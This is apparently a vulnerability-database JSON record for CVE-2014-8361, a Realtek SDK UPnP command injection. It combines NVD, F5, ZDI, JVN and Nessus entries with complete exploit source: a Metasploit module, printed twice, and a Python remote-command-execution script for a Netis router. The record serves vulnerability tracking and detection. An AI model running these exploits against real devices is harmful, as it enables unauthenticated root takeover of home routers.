"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2021-04-09T07:15:00", "cpe": ["cpe:/o:d-link:dir-605l_firmware:1.13", "cpe:/o:d-link:dir-600l_firmware:2.05", "cpe:/o:d-link:dir-905l_firmware:1.02", "cpe:/a:realtek:realtek_sdk:-", "cpe:/o:d-link:dir-600l_firmware:1.15", "cpe:/o:d-link:dir-809_firmware:1.02", "cpe:/o:d-link:dir-605l_firmware:2.04", "cpe:/o:d-link:dir-619l_firmware:2.03", "cpe:/o:d-link:dir-619l_firmware:1.15"], "id": "CVE-2014-8361", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8361", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:d-link:dir-619l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:2.04:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-905l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:realtek:realtek_sdk:-:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-619l_firmware:2.03:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-809_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:2.05:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:1.13:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-06-27T18:51:27", "bulletinFamily": "software", "cvelist": ["CVE-2014-8361"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-01-18T18:13:00", "published": "2018-01-18T18:13:00", "id": "F5:K57390658", "href": 
"https://support.f5.com/csp/article/K57390658", "title": "miniigd SOAP service in Realtek SDK vulnerability CVE-2014-8361", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2021-02-09T13:27:30", "bulletinFamily": "info", "cvelist": ["CVE-2021-22502"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "edition": 1, "modified": "2021-02-09T00:00:00", "published": "2021-02-09T00:00:00", "id": "ZDI-21-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-09T13:27:30", "bulletinFamily": "info", "cvelist": ["CVE-2021-22502"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. 
An attacker can leverage this vulnerability to execute code in the context of root.", "edition": 1, "modified": "2021-02-09T00:00:00", "published": "2021-02-09T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-06-22T11:40:05", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Realtek SDK. Authentication is not required to exploit this vulnerability. The specific flaw exists within the miniigd SOAP service. The issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.", "modified": "2015-06-22T00:00:00", "published": "2015-04-24T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-155/", "id": "ZDI-15-155", "title": "(0Day) Realtek SDK miniigd AddPortMapping SOAP Action Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:29", "description": "", "published": "2015-05-29T00:00:00", "type": "packetstorm", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-05-29T00:00:00", "id": "PACKETSTORM:132090", "href": "https://packetstormsecurity.com/files/132090/Realtek-SDK-Miniigd-UPnP-SOAP-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < 
Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', \n'Description' => %q{ \nDifferent devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command \ninjection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, \nthere is no output for the executed command. This module has been tested successfully on a \nTrendnet TEW-731BR router with emulation. \n}, \n'Author' => \n[ \n'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery \n'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-8361'], \n['ZDI', '15-155'], \n['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], \n['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] \n], \n'DisclosureDate' => 'Apr 24 2015', \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ 'MIPS Little Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE \n} \n], \n[ 'MIPS Big Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSBE \n} \n] \n], \n'DefaultTarget' => 0 \n)) \n \nderegister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') \n \nregister_options( \n[ \nOpt::RPORT(52869) # port of UPnP SOAP webinterface \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/picsdesc.xml' \n}) \nif res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/ \nreturn Exploit::CheckCode::Detected \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Unknown \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to access the 
device ...\") \n \nunless check == Exploit::CheckCode::Detected \nfail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\") \nend \n \nprint_status(\"#{peer} - Exploiting...\") \n \nexecute_cmdstager( \n:flavor => :echo, \n:linemax => 50, \n:nodelete => true \n) \nend \n \ndef execute_command(cmd, opts) \nuri = '/wanipcn.xml' \nsoap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' \ndata_cmd = '<?xml version=\"1.0\"?>' + build_soap_req \n \nbegin \nres = send_request_cgi({ \n'uri' => uri, \n'vars_get' => { \n'service' => 'WANIPConn1' \n}, \n'ctype' => 'text/xml', \n'method' => 'POST', \n'headers' => { \n'SOAPAction' => soap_action \n}, \n'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\") \n}) \nreturn res \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\") \nend \nend \n \ndef build_soap_req \nnew_external_port = rand(32767) + 32768 \nnew_internal_port = rand(32767) + 32768 \n \nxml = Document.new \n \nxml.add_element( \n'SOAP-ENV:Envelope', \n{ \n'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', \n'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' \n}) \n \nxml.root.add_element('SOAP-ENV:Body') \n \nbody = xml.root.elements[1] \n \nbody.add_element( \n'm:AddPortMapping', \n{ \n'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' \n}) \n \nport_mapping = body.elements[1] \nport_mapping.add_element('NewLeaseDuration') \nport_mapping.add_element('NewInternalClient') \nport_mapping.add_element('NewEnabled') \nport_mapping.add_element('NewExternalPort') \nport_mapping.add_element('NewRemoteHost') \nport_mapping.add_element('NewProtocol') \nport_mapping.add_element('NewInternalPort') \n \nport_mapping.elements['NewLeaseDuration'].text = '' \nport_mapping.elements['NewInternalClient'].text = 'CMD_HERE' \nport_mapping.elements['NewEnabled'].text = '1' 
\nport_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\" \nport_mapping.elements['NewRemoteHost'].text = '' \nport_mapping.elements['NewProtocol'].text = 'TCP' \nport_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\" \n \nxml.to_s \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132090/realtek_miniigd_upnp_exec_noauth.rb.txt"}, {"lastseen": "2020-03-02T22:58:24", "description": "", "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Netis WF2419 2.2.36123 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156588", "href": "https://packetstormsecurity.com/files/156588/Netis-WF2419-2.2.36123-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa \n# Vendor Homepage: http://www.netis-systems.com \n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 \n# Date: 2020-02-11 \n# Version: WF2419 V2.2.36123 => V2.2.36123 \n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123 \n# CVE : CVE-2019-19356 \n \n \n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\" \n \n#!/usr/bin/env python \nimport argparse \nimport requests \nimport json \n \ndef exploit(host,cmd): \n# Send Payload \nheaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n'Content-Type': 'application/x-www-form-urlencoded'} \npost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\" \nvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\" \nreq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value) \nprint('[+] Payload sent') \ntry : \njson_data = json.loads(req_payload.text) 
\nif json_data[0] == \"SUCCESS\": \nprint('[+] Exploit Sucess') \n# Get Command Result \nprint('[+] Getting Command Output\\n') \nresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\" \npost_data = \"mode_name=netcore_get&no=no\" \nreq_result = requests.post(result_page, data=post_data, headers=headers_value) \njson_data = json.loads(req_result.text) \nresults = json_data[\"tools_results\"] \nprint results.replace(';', '\\n') \nelse: \nprint('[-] Exploit Failed') \nexcept: \nprint(\"[!] You might need to login.\") \n \n# To be implemented \ndef login(user, password): \nprint('To be implemented') \n \ndef main(): \nhost = args.host \ncmd = args.cmd \nuser = args.user \npassword = args.password \n#login(user,password) \nexploit(host,cmd) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\") \nap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\") \nap.add_argument(\"cmd\", help=\"Command to run.\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\", \ndefault=\"admin\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\", \ndefault=\"admin\") \nargs = ap.parse_args() \nmain() \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156588/netiswf2419-exec.txt"}], "nessus": [{"lastseen": "2021-04-01T05:21:25", "description": "According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. 
An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-05-01T00:00:00", "title": "Realtek SDK miniigd SOAP Service RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-8361"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:realtek:realtek_sdk"], "id": "REALTEK_CVE_2014_8361.NASL", "href": "https://www.tenable.com/plugins/nessus/83185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83185);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-8361\");\n script_bugtraq_id(74330);\n script_xref(name:\"ZDI\", value:\"ZDI-15-155\");\n script_xref(name:\"EDB-ID\", value:\"37169\");\n\n script_name(english:\"Realtek SDK miniigd SOAP Service RCE\");\n script_summary(english:\"Checks the banners.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development kit running on the remote device is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-155/\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no fix available. 
As a workaround, restrict access\nto vulnerable devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Realtek SDK Miniigd UPnP SOAP Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realtek:realtek_sdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nglobal_var fix, vuln;\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of realtek upnpd. 
If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_realtek_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = eregmatch(string:server, pattern:\"realtek/v((0(\\.[0-9.]+)?|1\\.[0-3](\\.[0-9.]+)?|1)$)\", icase:TRUE);\n\n if (!isnull(ver))\n {\n vuln = TRUE;\n\n banner = ereg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", icase:TRUE);\n report =\n '\\n Server banner : ' + banner +\n '\\n Installed version : ' + ver[1] + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach(server in servers) _check_realtek_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP\nwww_ports = get_kb_list('Services/www');\n\nif(!vuln && isnull(www_ports))\n audit(AUDIT_HOST_NOT, 'affected');\n\nforeach port (www_ports)\n{\n server = http_server_header(port:port);\n if (empty_or_null(server)) continue;\n\n _check_realtek_version(port:port, server:server, proto:'tcp');\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T05:13:21", "description": "Realtek SDK Miniigd UPnP SOAP Command Execution. CVE-2014-8361. 
Remote exploit for linux platform", "published": "2015-06-01T00:00:00", "type": "exploitdb", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-06-01T00:00:00", "id": "EDB-ID:37169", "href": "https://www.exploit-db.com/exploits/37169/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. 
This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n Exploit::CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n\r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting...\")\r\n\r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n soap_action = 
'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n\r\n xml = Document.new\r\n\r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n\r\n xml.root.add_element('SOAP-ENV:Body')\r\n\r\n body = xml.root.elements[1]\r\n\r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n\r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n\r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n\r\n xml.to_s\r\n 
end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37169/"}], "jvn": [{"lastseen": "2019-05-29T19:49:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "description": "\n ## Description\n\nWSR-300HP provided by BUFFALO INC. is a wireless LAN router. WSR-300HP contains an arbitrary code execution vulnerability.\n\n ## Impact\n\nBy executing a specially crafted request prepared by a remote attacker, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Firmware** \nApply the firmware update according to the information provided by the developer.\n\n ## Products Affected\n\n * WSR-300HP firmware 2.30 and earlier\n", "edition": 4, "modified": "2017-08-08T00:00:00", "published": "2017-08-08T00:00:00", "id": "JVN:74871939", "href": "http://jvn.jp/en/jp/JVN74871939/index.html", "title": "JVN#74871939: WSR-300HP vulnerable to arbitrary code execution", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-09T06:35:42", "bulletinFamily": "info", "cvelist": ["CVE-2021-20680", "CVE-2014-8361"], "description": "\n ## Description\n\nMultiple Aterm products provided by NEC Corporation contain multiple vulnerabilities listed below. 
\n\n * **Cross-site Scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20680 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | **Base Score: 6.1** \n---|---|--- \nCVSS v2 | AV:N/AC:M/Au:N/C:N/I:P/A:N | **Base Score: 4.3** \n * **OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | **Base Score: 8.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:P/I:P/A:P | **Base Score: 5.8**\n\n ## Impact\n\n * An arbitrary script may be executed on the user's web browser - CVE-2021-20680\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Update the firmware** \n**For the users of WG1900HP2, WG1900HP, WG1800HP4, WG1200HS3, WG1200HS2, WG1200HP3, WG1200HP2, W1200EX, and W1200EX-MS:** \nUpdate the firmware to the latest version according to the information provided by the developer. \nAccording to the developer, the fixed firmware for WG1800HP3 will be released later. Until then, apply the following workarounds. \n \n**Apply workarounds** \n**For the users of WG1200HS, WG1200HP, WF800HP, WF300HP2, WR8165N, W500P, and W300P:** \nAccording to the developer, the update firmware for these products is not planned to be released. \nApplying the following workarounds may mitigate the impacts of the vulnerabilities. \n\n * Change the passwords of the web-based management utility and the Wi-Fi encryption key to stronger ones\n * CVE-2021-20680 \n * When accessing a website, use a URL obtained from a trusted source and bookmark it. 
For subsequent accesses, use the bookmarked URL.\n * Close the web browser after the operation is finished on the web-based management utility.\n * Delete the credential of the web-based management utility stored in the web browser.\n * CVE-2014-8361 \n * Disable UPnP.\n\n ## Products Affected\n\n * Aterm WG1900HP2 firmware Ver.1.3.1 and earlier\n * Aterm WG1900HP firmware Ver.2.5.1 and earlier\n * Aterm WG1800HP4 firmware Ver.1.3.1 and earlier\n * Aterm WG1800HP3 firmware Ver.1.5.1 and earlier\n * Aterm WG1200HS3 firmware Ver.1.1.2 and earlier - Only affected by CVE-2021-20680 issue\n * Aterm WG1200HS2 firmware Ver.2.5.0 and earlier\n * Aterm WG1200HP3 firmware Ver.1.3.1 and earlier\n * Aterm WG1200HP2 firmware Ver.2.5.0 and earlier\n * Aterm W1200EX firmware Ver.1.3.1 and earlier\n * Aterm W1200EX-MS firmware Ver.1.3.1 and earlier\n * Aterm WG1200HS firmware all versions\n * Aterm WG1200HP firmware all versions\n * Aterm WF800HP firmware all versions\n * Aterm WF300HP2 firmware all versions\n * Aterm WR8165N firmware all versions\n * Aterm W500P firmware all versions\n * Aterm W300P firmware all versions\n", "edition": 1, "modified": "2021-04-09T00:00:00", "published": "2021-04-09T00:00:00", "id": "JVN:67456944", "href": "http://jvn.jp/en/jp/JVN67456944/index.html", "title": "JVN#67456944: Multiple vulnerabilities in multiple Aterm products", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-26T07:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2021-20645", "CVE-2021-20646", "CVE-2021-20643", "CVE-2021-20644", "CVE-2021-20650", "CVE-2021-20649", "CVE-2021-20648", "CVE-2014-8361", "CVE-2021-20647"], "description": "\n ## Description\n\nMultiple products provided by ELECOM CO.,LTD. contain multiple vulnerabilities listed below. 
